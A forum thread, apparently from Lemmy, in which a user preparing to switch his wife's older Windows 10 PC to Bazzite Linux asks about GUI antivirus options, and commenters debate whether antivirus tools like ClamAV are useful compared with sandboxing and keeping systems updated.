I’m about to install bazzite on my wife’s older (2017) Windows 10 machine, and I’ve been going over how to recreate everything she currently has. Most programs (even proprietary ones) are not an issue, but I’m not finding much in the antivirus department.

I never even thought to install one on my Linux machine (also on bazzite, but I have used other distros in the past). So although I am no stranger to Linux, this issue blindsided me.

I know clamav exists, and I’m educating myself on how to use it, but a GUI would be nice for the wife. She’s not afraid of the terminal, but she likes the convenience of GUI programs.

Any suggestions? What do you use? Or is it just generally accepted that one should be careful and keep things up-to-date and that’s enough?

  • N.E.P.T.R@lemmy.blahaj.zoneEnglish
    232·
    1 day ago

    To be more clear, antivirus in general are mostly scams because they are advertised to do much more than they are actually capable (especially proprietary ones that act as spyware such as Norton or Avast, which have been caught selling user data). Hash based antivirus solutions (such as ClamAV) aren’t effective either because they rely on “badness enumeration”, in which you try to determine all the bad samples (through a sample list(s)) and alert or delete them when detected. This isn’t a good solution because a threat actor only has to add for example a single whitespace character into the code and it will produce a wildly different hash (which has not been sampled before). Badness enumeration is shit way to deal with real problems, much better is an allowlist approach, such as a permission system where to minimize the access given and soften the security until the app runs.

    TLDR: Antivirus bad at job of stopping malware, and sandboxed apps good for security of your device.

    • menas@lemmy.wtfEnglish
      3·
      18 hours ago

      I agree with your demonstration, but not the conclusion. The main threat in OP case is random attack made by massive and standardize attack. So hashed signature are better than nothing. Of course it is not enough for all kind of attack, like a focus one

    • unknownuserunknownlocation@kbin.earth
      91·
      24 hours ago

      I’m not sure where you get the idea that antivirus is mostly a scam. Yes, there are some questionable vendors out there, but it doesn’t mean it’s a scam. I know antivirus has saved my ass a couple of times, at least when I was younger. Was I doing something stupid? Yes. Do we all do something stupid every once in a while? Also yes.

    • Quetzalcutlass@lemmy.worldEnglish
      2·
      21 hours ago

      ClamAV is purely hash-based, not heuristic? I knew it scored incredibly poorly in AV tests, which would make sense if that’s still their approach.